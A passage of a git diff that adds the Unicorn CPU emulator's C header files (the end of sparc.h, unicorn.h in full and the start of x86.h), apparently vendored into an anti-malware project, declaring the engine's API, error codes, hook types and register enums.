UC_SPARC_REG_O7, + UC_SPARC_REG_Y, + + // special register + UC_SPARC_REG_XCC, + + // pseudo register + UC_SPARC_REG_PC, // program counter register + + UC_SPARC_REG_ENDING, // <-- mark the end of the list of registers + + // extras + UC_SPARC_REG_O6 = UC_SPARC_REG_SP, + UC_SPARC_REG_I6 = UC_SPARC_REG_FP, +} uc_sparc_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/unicorn.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/unicorn.h new file mode 100644 index 0000000..c7f1703 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/unicorn.h @@ -0,0 +1,779 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_ENGINE_H +#define UNICORN_ENGINE_H + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" +#include <stdarg.h> + +#if defined(UNICORN_HAS_OSXKERNEL) +#include <libkern/libkern.h> +#else +#include <stdlib.h> +#include <stdio.h> +#endif + +struct uc_struct; +typedef struct uc_struct uc_engine; + +typedef size_t uc_hook; + +#include "m68k.h" +#include "x86.h" +#include "arm.h" +#include "arm64.h" +#include "mips.h" +#include "sparc.h" + +#ifdef __GNUC__ +#define DEFAULT_VISIBILITY __attribute__((visibility("default"))) +#else +#define DEFAULT_VISIBILITY +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#pragma warning(disable:4100) +#ifdef UNICORN_SHARED +#define UNICORN_EXPORT __declspec(dllexport) +#else // defined(UNICORN_STATIC) +#define UNICORN_EXPORT +#endif +#else +#ifdef __GNUC__ +#define UNICORN_EXPORT __attribute__((visibility("default"))) +#else +#define UNICORN_EXPORT +#endif +#endif + +#ifdef __GNUC__ +#define UNICORN_DEPRECATED __attribute__((deprecated)) +#elif defined(_MSC_VER) +#define UNICORN_DEPRECATED __declspec(deprecated) +#else +#pragma message("WARNING: You need to implement UNICORN_DEPRECATED for this compiler") +#define UNICORN_DEPRECATED +#endif + +// Unicorn API version +#define UC_API_MAJOR 1 +#define UC_API_MINOR 0 + +// Unicorn package version +#define UC_VERSION_MAJOR UC_API_MAJOR +#define UC_VERSION_MINOR UC_API_MINOR +#define UC_VERSION_EXTRA 2 + + +/* + Macro to create combined version which can be compared to + result of uc_version() API. +*/ +#define UC_MAKE_VERSION(major, minor) ((major << 8) + minor) + +// Scales to calculate timeout on microsecond unit +// 1 second = 1000,000 microseconds +#define UC_SECOND_SCALE 1000000 +// 1 milisecond = 1000 nanoseconds +#define UC_MILISECOND_SCALE 1000 + +// Architecture type +typedef enum uc_arch { + UC_ARCH_ARM = 1, // ARM architecture (including Thumb, Thumb-2) + UC_ARCH_ARM64, // ARM-64, also called AArch64 + UC_ARCH_MIPS, // Mips architecture + UC_ARCH_X86, // X86 architecture (including x86 & x86-64) + UC_ARCH_PPC, // PowerPC architecture (currently unsupported) + UC_ARCH_SPARC, // Sparc architecture + UC_ARCH_M68K, // M68K architecture + UC_ARCH_MAX, +} uc_arch; + +// Mode type +typedef enum uc_mode { + UC_MODE_LITTLE_ENDIAN = 0, // little-endian mode (default mode) + UC_MODE_BIG_ENDIAN = 1 << 30, // big-endian mode + + // arm / arm64 + UC_MODE_ARM = 0, // ARM mode + UC_MODE_THUMB = 1 << 4, // THUMB mode (including Thumb-2) + UC_MODE_MCLASS = 1 << 5, // ARM's Cortex-M series (currently unsupported) + UC_MODE_V8 = 1 << 6, // ARMv8 A32 encodings for ARM (currently unsupported) + + // arm (32bit) cpu types + UC_MODE_ARM926 = 1 << 7, // ARM926 CPU type + UC_MODE_ARM946 = 1 << 8, // ARM946 CPU type + UC_MODE_ARM1176 = 1 << 9, // ARM1176 CPU type + + // mips + UC_MODE_MICRO = 1 << 4, // MicroMips mode (currently unsupported) + UC_MODE_MIPS3 = 1 << 5, // Mips III ISA (currently unsupported) + UC_MODE_MIPS32R6 = 1 << 6, // Mips32r6 ISA (currently unsupported) + UC_MODE_MIPS32 = 1 << 2, // Mips32 ISA + UC_MODE_MIPS64 = 1 << 3, // Mips64 ISA + + // x86 / x64 + UC_MODE_16 = 1 << 1, // 16-bit mode + UC_MODE_32 = 1 << 2, // 32-bit mode + UC_MODE_64 = 1 << 3, // 64-bit mode + + // ppc + UC_MODE_PPC32 = 1 << 2, // 32-bit mode (currently unsupported) + UC_MODE_PPC64 = 1 << 3, // 64-bit mode (currently unsupported) + UC_MODE_QPX = 1 << 4, // Quad Processing eXtensions mode (currently unsupported) + + // sparc + UC_MODE_SPARC32 = 1 << 2, // 32-bit mode + UC_MODE_SPARC64 = 1 << 3, // 64-bit mode + UC_MODE_V9 = 1 << 4, // SparcV9 mode (currently unsupported) + + // m68k +} uc_mode; + +// All type of errors encountered by Unicorn API. +// These are values returned by uc_errno() +typedef enum uc_err { + UC_ERR_OK = 0, // No error: everything was fine + UC_ERR_NOMEM, // Out-Of-Memory error: uc_open(), uc_emulate() + UC_ERR_ARCH, // Unsupported architecture: uc_open() + UC_ERR_HANDLE, // Invalid handle + UC_ERR_MODE, // Invalid/unsupported mode: uc_open() + UC_ERR_VERSION, // Unsupported version (bindings) + UC_ERR_READ_UNMAPPED, // Quit emulation due to READ on unmapped memory: uc_emu_start() + UC_ERR_WRITE_UNMAPPED, // Quit emulation due to WRITE on unmapped memory: uc_emu_start() + UC_ERR_FETCH_UNMAPPED, // Quit emulation due to FETCH on unmapped memory: uc_emu_start() + UC_ERR_HOOK, // Invalid hook type: uc_hook_add() + UC_ERR_INSN_INVALID, // Quit emulation due to invalid instruction: uc_emu_start() + UC_ERR_MAP, // Invalid memory mapping: uc_mem_map() + UC_ERR_WRITE_PROT, // Quit emulation due to UC_MEM_WRITE_PROT violation: uc_emu_start() + UC_ERR_READ_PROT, // Quit emulation due to UC_MEM_READ_PROT violation: uc_emu_start() + UC_ERR_FETCH_PROT, // Quit emulation due to UC_MEM_FETCH_PROT violation: uc_emu_start() + UC_ERR_ARG, // Inavalid argument provided to uc_xxx function (See specific function API) + UC_ERR_READ_UNALIGNED, // Unaligned read + UC_ERR_WRITE_UNALIGNED, // Unaligned write + UC_ERR_FETCH_UNALIGNED, // Unaligned fetch + UC_ERR_HOOK_EXIST, // hook for this event already existed + UC_ERR_RESOURCE, // Insufficient resource: uc_emu_start() + UC_ERR_EXCEPTION, // Unhandled CPU exception +} uc_err; + + +/* + Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) + + @address: address where the code is being executed + @size: size of machine instruction(s) being executed, or 0 when size is unknown + @user_data: user data passed to tracing APIs. +*/ +typedef void (*uc_cb_hookcode_t)(uc_engine *uc, uint64_t address, uint32_t size, void *user_data); + +/* + Callback function for tracing interrupts (for uc_hook_intr()) + + @intno: interrupt number + @user_data: user data passed to tracing APIs. +*/ +typedef void (*uc_cb_hookintr_t)(uc_engine *uc, uint32_t intno, void *user_data); + +/* + Callback function for tracing invalid instructions + + @user_data: user data passed to tracing APIs. + + @return: return true to continue, or false to stop program (due to invalid instruction). +*/ +typedef bool (*uc_cb_hookinsn_invalid_t)(uc_engine *uc, void *user_data); + +/* + Callback function for tracing IN instruction of X86 + + @port: port number + @size: data size (1/2/4) to be read from this port + @user_data: user data passed to tracing APIs. +*/ +typedef uint32_t (*uc_cb_insn_in_t)(uc_engine *uc, uint32_t port, int size, void *user_data); + +/* + Callback function for OUT instruction of X86 + + @port: port number + @size: data size (1/2/4) to be written to this port + @value: data value to be written to this port +*/ +typedef void (*uc_cb_insn_out_t)(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data); + +// All type of memory accesses for UC_HOOK_MEM_* +typedef enum uc_mem_type { + UC_MEM_READ = 16, // Memory is read from + UC_MEM_WRITE, // Memory is written to + UC_MEM_FETCH, // Memory is fetched + UC_MEM_READ_UNMAPPED, // Unmapped memory is read from + UC_MEM_WRITE_UNMAPPED, // Unmapped memory is written to + UC_MEM_FETCH_UNMAPPED, // Unmapped memory is fetched + UC_MEM_WRITE_PROT, // Write to write protected, but mapped, memory + UC_MEM_READ_PROT, // Read from read protected, but mapped, memory + UC_MEM_FETCH_PROT, // Fetch from non-executable, but mapped, memory + UC_MEM_READ_AFTER, // Memory is read from (successful access) +} uc_mem_type; + +// All type of hooks for uc_hook_add() API. +typedef enum uc_hook_type { + // Hook all interrupt/syscall events + UC_HOOK_INTR = 1 << 0, + // Hook a particular instruction - only a very small subset of instructions supported here + UC_HOOK_INSN = 1 << 1, + // Hook a range of code + UC_HOOK_CODE = 1 << 2, + // Hook basic blocks + UC_HOOK_BLOCK = 1 << 3, + // Hook for memory read on unmapped memory + UC_HOOK_MEM_READ_UNMAPPED = 1 << 4, + // Hook for invalid memory write events + UC_HOOK_MEM_WRITE_UNMAPPED = 1 << 5, + // Hook for invalid memory fetch for execution events + UC_HOOK_MEM_FETCH_UNMAPPED = 1 << 6, + // Hook for memory read on read-protected memory + UC_HOOK_MEM_READ_PROT = 1 << 7, + // Hook for memory write on write-protected memory + UC_HOOK_MEM_WRITE_PROT = 1 << 8, + // Hook for memory fetch on non-executable memory + UC_HOOK_MEM_FETCH_PROT = 1 << 9, + // Hook memory read events. + UC_HOOK_MEM_READ = 1 << 10, + // Hook memory write events. + UC_HOOK_MEM_WRITE = 1 << 11, + // Hook memory fetch for execution events + UC_HOOK_MEM_FETCH = 1 << 12, + // Hook memory read events, but only successful access. + // The callback will be triggered after successful read. + UC_HOOK_MEM_READ_AFTER = 1 << 13, + // Hook invalid instructions exceptions. + UC_HOOK_INSN_INVALID = 1 << 14, +} uc_hook_type; + +// Hook type for all events of unmapped memory access +#define UC_HOOK_MEM_UNMAPPED (UC_HOOK_MEM_READ_UNMAPPED + UC_HOOK_MEM_WRITE_UNMAPPED + UC_HOOK_MEM_FETCH_UNMAPPED) +// Hook type for all events of illegal protected memory access +#define UC_HOOK_MEM_PROT (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_FETCH_PROT) +// Hook type for all events of illegal read memory access +#define UC_HOOK_MEM_READ_INVALID (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_READ_UNMAPPED) +// Hook type for all events of illegal write memory access +#define UC_HOOK_MEM_WRITE_INVALID (UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_WRITE_UNMAPPED) +// Hook type for all events of illegal fetch memory access +#define UC_HOOK_MEM_FETCH_INVALID (UC_HOOK_MEM_FETCH_PROT + UC_HOOK_MEM_FETCH_UNMAPPED) +// Hook type for all events of illegal memory access +#define UC_HOOK_MEM_INVALID (UC_HOOK_MEM_UNMAPPED + UC_HOOK_MEM_PROT) +// Hook type for all events of valid memory access +// NOTE: UC_HOOK_MEM_READ is triggered before UC_HOOK_MEM_READ_PROT and UC_HOOK_MEM_READ_UNMAPPED, so +// this hook may technically trigger on some invalid reads. +#define UC_HOOK_MEM_VALID (UC_HOOK_MEM_READ + UC_HOOK_MEM_WRITE + UC_HOOK_MEM_FETCH) + +/* + Callback function for hooking memory (READ, WRITE & FETCH) + + @type: this memory is being READ, or WRITE + @address: address where the code is being executed + @size: size of data being read or written + @value: value of data being written to memory, or irrelevant if type = READ. + @user_data: user data passed to tracing APIs +*/ +typedef void (*uc_cb_hookmem_t)(uc_engine *uc, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data); + +/* + Callback function for handling invalid memory access events (UNMAPPED and + PROT events) + + @type: this memory is being READ, or WRITE + @address: address where the code is being executed + @size: size of data being read or written + @value: value of data being written to memory, or irrelevant if type = READ. + @user_data: user data passed to tracing APIs + + @return: return true to continue, or false to stop program (due to invalid memory). + NOTE: returning true to continue execution will only work if the accessed + memory is made accessible with the correct permissions during the hook. + + In the event of a UC_MEM_READ_UNMAPPED or UC_MEM_WRITE_UNMAPPED callback, + the memory should be uc_mem_map()-ed with the correct permissions, and the + instruction will then read or write to the address as it was supposed to. + + In the event of a UC_MEM_FETCH_UNMAPPED callback, the memory can be mapped + in as executable, in which case execution will resume from the fetched address. + The instruction pointer may be written to in order to change where execution resumes, + but the fetch must succeed if execution is to resume. +*/ +typedef bool (*uc_cb_eventmem_t)(uc_engine *uc, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data); + +/* + Memory region mapped by uc_mem_map() and uc_mem_map_ptr() + Retrieve the list of memory regions with uc_mem_regions() +*/ +typedef struct uc_mem_region { + uint64_t begin; // begin address of the region (inclusive) + uint64_t end; // end address of the region (inclusive) + uint32_t perms; // memory permissions of the region +} uc_mem_region; + +// All type of queries for uc_query() API. +typedef enum uc_query_type { + // Dynamically query current hardware mode. + UC_QUERY_MODE = 1, + UC_QUERY_PAGE_SIZE, // query pagesize of engine + UC_QUERY_ARCH, // query architecture of engine (for ARM to query Thumb mode) + UC_QUERY_TIMEOUT, // query if emulation stops due to timeout (indicated if result = True) +} uc_query_type; + +// Opaque storage for CPU context, used with uc_context_*() +struct uc_context; +typedef struct uc_context uc_context; + +/* + Return combined API version & major and minor version numbers. + + @major: major number of API version + @minor: minor number of API version + + @return hexical number as (major << 8 | minor), which encodes both + major & minor versions. + NOTE: This returned value can be compared with version number made + with macro UC_MAKE_VERSION + + For example, second API version would return 1 in @major, and 1 in @minor + The return value would be 0x0101 + + NOTE: if you only care about returned value, but not major and minor values, + set both @major & @minor arguments to NULL. +*/ +UNICORN_EXPORT +unsigned int uc_version(unsigned int *major, unsigned int *minor); + + +/* + Determine if the given architecture is supported by this library. + + @arch: architecture type (UC_ARCH_*) + + @return True if this library supports the given arch. +*/ +UNICORN_EXPORT +bool uc_arch_supported(uc_arch arch); + + +/* + Create new instance of unicorn engine. + + @arch: architecture type (UC_ARCH_*) + @mode: hardware mode. This is combined of UC_MODE_* + @uc: pointer to uc_engine, which will be updated at return time + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **uc); + +/* + Close a Unicorn engine instance. + NOTE: this must be called only when there is no longer any + usage of @uc. This API releases some of @uc's cached memory, thus + any use of the Unicorn API with @uc after it has been closed may + crash your application. After this, @uc is invalid, and is no + longer usable. + + @uc: pointer to a handle returned by uc_open() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_close(uc_engine *uc); + +/* + Query internal status of engine. + + @uc: handle returned by uc_open() + @type: query type. See uc_query_type + + @result: save the internal status queried + + @return: error code of uc_err enum type (UC_ERR_*, see above) +*/ +UNICORN_EXPORT +uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result); + +/* + Report the last error number when some API function fails. + Like glibc's errno, uc_errno might not retain its old value once accessed. + + @uc: handle returned by uc_open() + + @return: error code of uc_err enum type (UC_ERR_*, see above) +*/ +UNICORN_EXPORT +uc_err uc_errno(uc_engine *uc); + +/* + Return a string describing given error code. + + @code: error code (see UC_ERR_* above) + + @return: returns a pointer to a string that describes the error code + passed in the argument @code + */ +UNICORN_EXPORT +const char *uc_strerror(uc_err code); + +/* + Write to register. + + @uc: handle returned by uc_open() + @regid: register ID that is to be modified. + @value: pointer to the value that will set to register @regid + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_reg_write(uc_engine *uc, int regid, const void *value); + +/* + Read register value. + + @uc: handle returned by uc_open() + @regid: register ID that is to be retrieved. + @value: pointer to a variable storing the register value. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_reg_read(uc_engine *uc, int regid, void *value); + +/* + Write multiple register values. + + @uc: handle returned by uc_open() + @rges: array of register IDs to store + @value: pointer to array of register values + @count: length of both *regs and *vals + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count); + +/* + Read multiple register values. + + @uc: handle returned by uc_open() + @rges: array of register IDs to retrieve + @value: pointer to array of values to hold registers + @count: length of both *regs and *vals + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count); + +/* + Write to a range of bytes in memory. + + @uc: handle returned by uc_open() + @address: starting memory address of bytes to set. + @bytes: pointer to a variable containing data to be written to memory. + @size: size of memory to write to. + + NOTE: @bytes must be big enough to contain @size bytes. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *bytes, size_t size); + +/* + Read a range of bytes in memory. + + @uc: handle returned by uc_open() + @address: starting memory address of bytes to get. + @bytes: pointer to a variable containing data copied from memory. + @size: size of memory to read. + + NOTE: @bytes must be big enough to contain @size bytes. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size); + +/* + Emulate machine code in a specific duration of time. + + @uc: handle returned by uc_open() + @begin: address where emulation starts + @until: address where emulation stops (i.e. when this address is hit) + @timeout: duration to emulate the code (in microseconds). When this value is 0, + we will emulate the code in infinite time, until the code is finished. + @count: the number of instructions to be emulated. When this value is 0, + we will emulate all the code available, until the code is finished. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count); + +/* + Stop emulation (which was started by uc_emu_start() API. + This is typically called from callback functions registered via tracing APIs. + + @uc: handle returned by uc_open() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_emu_stop(uc_engine *uc); + +/* + Register callback for a hook event. + The callback will be run when the hook event is hit. + + @uc: handle returned by uc_open() + @hh: hook handle returned from this registration. To be used in uc_hook_del() API + @type: hook type, refer to uc_hook_type enum + @callback: callback to be run when instruction is hit + @user_data: user-defined data. This will be passed to callback function in its + last argument @user_data + @begin: start address of the area where the callback is in effect (inclusive) + @end: end address of the area where the callback is in effect (inclusive) + NOTE 1: the callback is called only if related address is in range [@begin, @end] + NOTE 2: if @begin > @end, callback is called whenever this hook type is triggered + @...: variable arguments (depending on @type) + NOTE: if @type = UC_HOOK_INSN, this is the instruction ID (ex: UC_X86_INS_OUT) + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, + void *user_data, uint64_t begin, uint64_t end, ...); + +/* + Unregister (remove) a hook callback. + This API removes the hook callback registered by uc_hook_add(). + NOTE: this should be called only when you no longer want to trace. + After this, @hh is invalid, and no longer usable. + + @uc: handle returned by uc_open() + @hh: handle returned by uc_hook_add() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_hook_del(uc_engine *uc, uc_hook hh); + +typedef enum uc_prot { + UC_PROT_NONE = 0, + UC_PROT_READ = 1, + UC_PROT_WRITE = 2, + UC_PROT_EXEC = 4, + UC_PROT_ALL = 7, +} uc_prot; + +/* + Map memory in for emulation. + This API adds a memory region that can be used by emulation. + + @uc: handle returned by uc_open() + @address: starting address of the new memory region to be mapped in. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the new memory region to be mapped in. + This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: Permissions for the newly mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); + +/* + Map existing host memory in for emulation. + This API adds a memory region that can be used by emulation. + + @uc: handle returned by uc_open() + @address: starting address of the new memory region to be mapped in. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the new memory region to be mapped in. + This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: Permissions for the newly mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + @ptr: pointer to host memory backing the newly mapped memory. This host memory is + expected to be of equal or larger size than provided, and be mapped with at + least PROT_READ | PROT_WRITE. If it is not, the resulting behavior is undefined. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr); + +/* + Unmap a region of emulation memory. + This API deletes a memory mapping from the emulation memory space. + + @uc: handle returned by uc_open() + @address: starting address of the memory region to be unmapped. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the memory region to be modified. + This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_unmap(uc_engine *uc, uint64_t address, size_t size); + +/* + Set memory permissions for emulation memory. + This API changes permissions on an existing memory region. + + @uc: handle returned by uc_open() + @address: starting address of the memory region to be modified. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the memory region to be modified. + This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: New permissions for the mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); + +/* + Retrieve all memory regions mapped by uc_mem_map() and uc_mem_map_ptr() + This API allocates memory for @regions, and user must free this memory later + by uc_free() to avoid leaking memory. + NOTE: memory regions may be split by uc_mem_unmap() + + @uc: handle returned by uc_open() + @regions: pointer to an array of uc_mem_region struct. This is allocated by + Unicorn, and must be freed by user later with uc_free() + @count: pointer to number of struct uc_mem_region contained in @regions + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count); + +/* + Allocate a region that can be used with uc_context_{save,restore} to perform + quick save/rollback of the CPU context, which includes registers and some + internal metadata. Contexts may not be shared across engine instances with + differing arches or modes. + + @uc: handle returned by uc_open() + @context: pointer to a uc_context*. This will be updated with the pointer to + the new context on successful return of this function. + Later, this allocated memory must be freed with uc_context_free(). + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_context_alloc(uc_engine *uc, uc_context **context); + +/* + Free the memory allocated by uc_mem_regions. + WARNING: After Unicorn 1.0.1rc5, the memory allocated by uc_context_alloc should + be freed by uc_context_free(). Calling uc_free() may still work, but the result + is **undefined**. + + @mem: memory allocated by uc_mem_regions (returned in *regions). + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_free(void *mem); + +/* + Save a copy of the internal CPU context. + This API should be used to efficiently make or update a saved copy of the + internal CPU state. + + @uc: handle returned by uc_open() + @context: handle returned by uc_context_alloc() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_context_save(uc_engine *uc, uc_context *context); + +/* + Restore the current CPU context from a saved copy. + This API should be used to roll the CPU context back to a previous + state saved by uc_context_save(). + + @uc: handle returned by uc_open() + @context: handle returned by uc_context_alloc that has been used with uc_context_save + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_context_restore(uc_engine *uc, uc_context *context); + + +/* + Return the size needed to store the cpu context. Can be used to allocate a buffer + to contain the cpu context and directly call uc_context_save. + + @uc: handle returned by uc_open() + + @return the size for needed to store the cpu context as as size_t. +*/ +UNICORN_EXPORT +size_t uc_context_size(uc_engine *uc); + + +/* + Free the context allocated by uc_context_alloc(). + + @context: handle returned by uc_context_alloc() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_context_free(uc_context *context); + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/x86.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/x86.h new file mode 100644 index 0000000..cd2c66d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/x86.h @@ -0,0 +1,1446 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_X86_H +#define UNICORN_X86_H + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +// Memory-Management Register for instructions IDTR, GDTR, LDTR, TR. +// Borrow from SegmentCache in qemu/target-i386/cpu.h +typedef struct uc_x86_mmr { + uint16_t selector; /* not used by GDTR and IDTR */ + uint64_t base; /* handle 32 or 64 bit CPUs */ + uint32_t limit; + uint32_t flags; /* not used by GDTR and IDTR */ +} uc_x86_mmr; + +// Model-Specific Register structure, use this with UC_X86_REG_MSR (as the register ID) in +// call to uc_reg_write/uc_reg_read() to manipulate MSRs. +typedef struct uc_x86_msr { + uint32_t rid; // MSR id + uint64_t value; // MSR value +} uc_x86_msr; + +// Callback function for tracing SYSCALL/SYSENTER (for uc_hook_intr()) +// @user_data: user data passed to tracing APIs. +typedef void (*uc_cb_insn_syscall_t)(struct uc_struct *uc, void *user_data); + +//> X86 registers +typedef enum uc_x86_reg { + UC_X86_REG_INVALID = 0, + UC_X86_REG_AH, UC_X86_REG_AL, UC_X86_REG_AX, UC_X86_REG_BH, UC_X86_REG_BL, + UC_X86_REG_BP, UC_X86_REG_BPL, UC_X86_REG_BX, UC_X86_REG_CH, UC_X86_REG_CL, + UC_X86_REG_CS, UC_X86_REG_CX, UC_X86_REG_DH, UC_X86_REG_DI, UC_X86_REG_DIL, + UC_X86_REG_DL, UC_X86_REG_DS, UC_X86_REG_DX, UC_X86_REG_EAX, UC_X86_REG_EBP, + UC_X86_REG_EBX, UC_X86_REG_ECX, UC_X86_REG_EDI, UC_X86_REG_EDX, UC_X86_REG_EFLAGS, + UC_X86_REG_EIP, UC_X86_REG_EIZ, UC_X86_REG_ES, UC_X86_REG_ESI, UC_X86_REG_ESP, + UC_X86_REG_FPSW, UC_X86_REG_FS, UC_X86_REG_GS, UC_X86_REG_IP, UC_X86_REG_RAX, + UC_X86_REG_RBP, UC_X86_REG_RBX, UC_X86_REG_RCX, UC_X86_REG_RDI, UC_X86_REG_RDX, + UC_X86_REG_RIP, UC_X86_REG_RIZ, UC_X86_REG_RSI, UC_X86_REG_RSP, UC_X86_REG_SI, + UC_X86_REG_SIL, UC_X86_REG_SP, UC_X86_REG_SPL, UC_X86_REG_SS, UC_X86_REG_CR0, + UC_X86_REG_CR1, UC_X86_REG_CR2, UC_X86_REG_CR3, UC_X86_REG_CR4, UC_X86_REG_CR5, + UC_X86_REG_CR6, UC_X86_REG_CR7, UC_X86_REG_CR8, UC_X86_REG_CR9, UC_X86_REG_CR10, + UC_X86_REG_CR11, UC_X86_REG_CR12, UC_X86_REG_CR13, UC_X86_REG_CR14, UC_X86_REG_CR15, + UC_X86_REG_DR0, UC_X86_REG_DR1, UC_X86_REG_DR2, UC_X86_REG_DR3, UC_X86_REG_DR4, + UC_X86_REG_DR5, UC_X86_REG_DR6, UC_X86_REG_DR7, UC_X86_REG_DR8, UC_X86_REG_DR9, + UC_X86_REG_DR10, UC_X86_REG_DR11, UC_X86_REG_DR12, UC_X86_REG_DR13, UC_X86_REG_DR14, + UC_X86_REG_DR15, UC_X86_REG_FP0, UC_X86_REG_FP1, UC_X86_REG_FP2, UC_X86_REG_FP3, + UC_X86_REG_FP4, UC_X86_REG_FP5, UC_X86_REG_FP6, UC_X86_REG_FP7, + UC_X86_REG_K0, UC_X86_REG_K1, UC_X86_REG_K2, UC_X86_REG_K3, UC_X86_REG_K4, + UC_X86_REG_K5, UC_X86_REG_K6, UC_X86_REG_K7, UC_X86_REG_MM0, UC_X86_REG_MM1, + UC_X86_REG_MM2, UC_X86_REG_MM3, UC_X86_REG_MM4, UC_X86_REG_MM5, UC_X86_REG_MM6, + UC_X86_REG_MM7, UC_X86_REG_R8, UC_X86_REG_R9, UC_X86_REG_R10, UC_X86_REG_R11, + UC_X86_REG_R12, UC_X86_REG_R13, UC_X86_REG_R14, UC_X86_REG_R15, + UC_X86_REG_ST0, UC_X86_REG_ST1, UC_X86_REG_ST2, UC_X86_REG_ST3, + UC_X86_REG_ST4, UC_X86_REG_ST5, UC_X86_REG_ST6, UC_X86_REG_ST7, + UC_X86_REG_XMM0, UC_X86_REG_XMM1, UC_X86_REG_XMM2, UC_X86_REG_XMM3, UC_X86_REG_XMM4, + UC_X86_REG_XMM5, UC_X86_REG_XMM6, UC_X86_REG_XMM7, UC_X86_REG_XMM8, UC_X86_REG_XMM9, + UC_X86_REG_XMM10, UC_X86_REG_XMM11, UC_X86_REG_XMM12, 